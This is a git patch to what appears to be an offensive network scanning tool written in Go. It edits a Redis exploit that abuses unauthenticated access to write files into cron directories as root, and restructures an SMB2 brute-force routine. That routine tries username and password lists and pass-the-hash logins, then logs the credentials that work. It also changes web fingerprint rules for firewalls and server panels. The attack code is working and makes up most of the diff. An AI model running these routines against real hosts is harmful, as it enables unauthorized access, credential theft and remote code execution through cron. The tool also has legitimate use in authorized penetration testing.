From 513bb93e1bb8135675b2870550b3f0b47e0b6d4c Mon Sep 17 00:00:00 2001
From: shadow1ng <shadow1ng@qq.com>
Date: Thu, 29 Aug 2024 09:50:32 +0800
Subject: [PATCH] update

---
 Plugins/redis.go      |  23 ++++----
 Plugins/smb2.go       | 118 +++++++++++++++++++++++++++++-------------
 WebScan/info/rules.go |   4 +-
 3 files changed, 97 insertions(+), 48 deletions(-)

diff --git a/Plugins/redis.go b/Plugins/redis.go
index e69feb9..88ad73d 100644
--- a/Plugins/redis.go
+++ b/Plugins/redis.go
@@ -118,6 +118,9 @@ func RedisUnauth(info *common.HostInfo) (flag bool, err error) {
 }
 
 func Expoilt(realhost string, conn net.Conn) error {
+	if common.Noredistest {
+		return nil
+	}
 	flagSsh, flagCron, err := testwrite(conn)
 	if err != nil {
 		return err
@@ -221,26 +224,26 @@ func writekey(conn net.Conn, filename string) (flag bool, text string, err error
 
 func writecron(conn net.Conn, host string) (flag bool, text string, err error) {
 	flag = false
-    	// 尝试写入Ubuntu的路径
-    	_, err = conn.Write([]byte("CONFIG SET dir /var/spool/cron/crontabs/\r\n"))
-    	if err != nil {
-		return flag, text, err
-    	}
-    	text, err = readreply(conn)
+	// 尝试写入Ubuntu的路径
+	_, err = conn.Write([]byte("CONFIG SET dir /var/spool/cron/crontabs/\r\n"))
 	if err != nil {
 		return flag, text, err
 	}
-    	if !strings.Contains(text, "OK") {
+	text, err = readreply(conn)
+	if err != nil {
+		return flag, text, err
+	}
+	if !strings.Contains(text, "OK") {
 		// 如果没有返回"OK"，可能是CentOS，尝试CentOS的路径
 		_, err = conn.Write([]byte("CONFIG SET dir /var/spool/cron/\r\n"))
 		if err != nil {
-	    		return flag, text, err
+			return flag, text, err
 		}
 		text, err = readreply(conn)
 		if err != nil {
-	    		return flag, text, err
+			return flag, text, err
 		}
-    	}
+	}
 	if strings.Contains(text, "OK") {
 		_, err = conn.Write([]byte("CONFIG SET dbfilename root\r\n"))
 		if err != nil {
diff --git a/Plugins/smb2.go b/Plugins/smb2.go
index 1204e3e..57c52ff 100644
--- a/Plugins/smb2.go
+++ b/Plugins/smb2.go
@@ -17,51 +17,97 @@ func SmbScan2(info *common.HostInfo) (tmperr error) {
 	}
 	hasprint := false
 	starttime := time.Now().Unix()
-	hash := common.HashBytes
-	for _, user := range common.Userdict["smb"] {
-	PASS:
-		for _, pass := range common.Passwords {
-			pass = strings.Replace(pass, "{user}", user, -1)
-			flag, err, flag2 := Smb2Con(info, user, pass, hash, hasprint)
-			if flag2 {
-				hasprint = true
-			}
-			if flag == true {
-				var result string
-				if common.Domain != "" {
-					result = fmt.Sprintf("[+] SMB2 %v:%v:%v\\%v ", info.Host, info.Ports, common.Domain, user)
-				} else {
-					result = fmt.Sprintf("[+] SMB2 %v:%v:%v ", info.Host, info.Ports, user)
+	if len(common.HashBytes) > 0 {
+		for _, user := range common.Userdict["smb"] {
+			for _, hash := range common.HashBytes {
+				pass := ""
+				flag, err, flag2 := Smb2Con(info, user, pass, hash, hasprint)
+				if flag2 {
+					hasprint = true
 				}
-				if len(hash) > 0 {
-					result += "hash: " + common.Hash
+				if flag == true {
+					var result string
+					if common.Domain != "" {
+						result = fmt.Sprintf("[+] SMB2 %v:%v:%v\\%v ", info.Host, info.Ports, common.Domain, user)
+					} else {
+						result = fmt.Sprintf("[+] SMB2 %v:%v:%v ", info.Host, info.Ports, user)
+					}
+					if len(hash) > 0 {
+						result += "hash: " + common.Hash
+					} else {
+						result += pass
+					}
+					common.LogSuccess(result)
+					return err
 				} else {
-					result += pass
+					var errlog string
+					if len(common.Hash) > 0 {
+						errlog = fmt.Sprintf("[-] smb2 %v:%v %v %v %v", info.Host, 445, user, common.Hash, err)
+					} else {
+						errlog = fmt.Sprintf("[-] smb2 %v:%v %v %v %v", info.Host, 445, user, pass, err)
+					}
+					errlog = strings.Replace(errlog, "\n", " ", -1)
+					common.LogError(errlog)
+					tmperr = err
+					if common.CheckErrs(err) {
+						return err
+					}
+					if time.Now().Unix()-starttime > (int64(len(common.Userdict["smb"])*len(common.HashBytes)) * common.Timeout) {
+						return err
+					}
 				}
-				common.LogSuccess(result)
-				return err
-			} else {
-				var errlog string
 				if len(common.Hash) > 0 {
-					errlog = fmt.Sprintf("[-] smb2 %v:%v %v %v %v", info.Host, 445, user, common.Hash, err)
-				} else {
-					errlog = fmt.Sprintf("[-] smb2 %v:%v %v %v %v", info.Host, 445, user, pass, err)
-				}
-				errlog = strings.Replace(errlog, "\n", " ", -1)
-				common.LogError(errlog)
-				tmperr = err
-				if common.CheckErrs(err) {
-					return err
-				}
-				if time.Now().Unix()-starttime > (int64(len(common.Userdict["smb"])*len(common.Passwords)) * common.Timeout) {
-					return err
+					break
 				}
 			}
-			if len(common.Hash) > 0 {
-				break PASS
+		}
+	} else {
+		for _, user := range common.Userdict["smb"] {
+			for _, pass := range common.Passwords {
+				pass = strings.Replace(pass, "{user}", user, -1)
+				hash := []byte{}
+				flag, err, flag2 := Smb2Con(info, user, pass, hash, hasprint)
+				if flag2 {
+					hasprint = true
+				}
+				if flag == true {
+					var result string
+					if common.Domain != "" {
+						result = fmt.Sprintf("[+] SMB2 %v:%v:%v\\%v ", info.Host, info.Ports, common.Domain, user)
+					} else {
+						result = fmt.Sprintf("[+] SMB2 %v:%v:%v ", info.Host, info.Ports, user)
+					}
+					if len(hash) > 0 {
+						result += "hash: " + common.Hash
+					} else {
+						result += pass
+					}
+					common.LogSuccess(result)
+					return err
+				} else {
+					var errlog string
+					if len(common.Hash) > 0 {
+						errlog = fmt.Sprintf("[-] smb2 %v:%v %v %v %v", info.Host, 445, user, common.Hash, err)
+					} else {
+						errlog = fmt.Sprintf("[-] smb2 %v:%v %v %v %v", info.Host, 445, user, pass, err)
+					}
+					errlog = strings.Replace(errlog, "\n", " ", -1)
+					common.LogError(errlog)
+					tmperr = err
+					if common.CheckErrs(err) {
+						return err
+					}
+					if time.Now().Unix()-starttime > (int64(len(common.Userdict["smb"])*len(common.Passwords)) * common.Timeout) {
+						return err
+					}
+				}
+				if len(common.Hash) > 0 {
+					break
+				}
 			}
 		}
 	}
+
 	return tmperr
 }
 
diff --git a/WebScan/info/rules.go b/WebScan/info/rules.go
index 939b981..e7184db 100644
--- a/WebScan/info/rules.go
+++ b/WebScan/info/rules.go
@@ -17,7 +17,7 @@ type PocData struct {
 }
 
 var RuleDatas = []RuleData{
-	{"宝塔", "body", "(app.bt.cn/static/app.png|安全入口校验失败|<title>入口校验失败</title>|href=\"http://www.bt.cn/bbs)"},
+	{"宝塔", "code", "(app.bt.cn/static/app.png|安全入口校验失败|<title>入口校验失败</title>|href=\"http://www.bt.cn/bbs)"},
 	{"深信服防火墙类产品", "code", "(SANGFOR FW)"},
 	{"360网站卫士", "code", "(webscan.360.cn/status/pai/hash|wzws-waf-cgi|zhuji.360.cn/guard/firewall/stopattack.html)"},
 	{"360网站卫士", "headers", "(360wzws|CWAP-waf|zhuji.360.cn|X-Safe-Firewall)"},
@@ -55,7 +55,7 @@ var RuleDatas = []RuleData{
 	{"Yundun", "headers", "(YUNDUN)"},
 	{"Yunsuo", "headers", "(yunsuo)"},
 	{"Coding pages", "header", "(Coding Pages)"},
-	{"启明防火墙", "body", "(/cgi-bin/webui?op=get_product_model)"},
+	{"启明防火墙", "code", "(/cgi-bin/webui?op=get_product_model)"},
 	{"Shiro", "headers", "(=deleteMe|rememberMe=)"},
 	{"Portainer(Docker管理)", "code", "(portainer.updatePassword|portainer.init.admin)"},
 	{"Gogs简易Git服务", "cookie", "(i_like_gogs)"},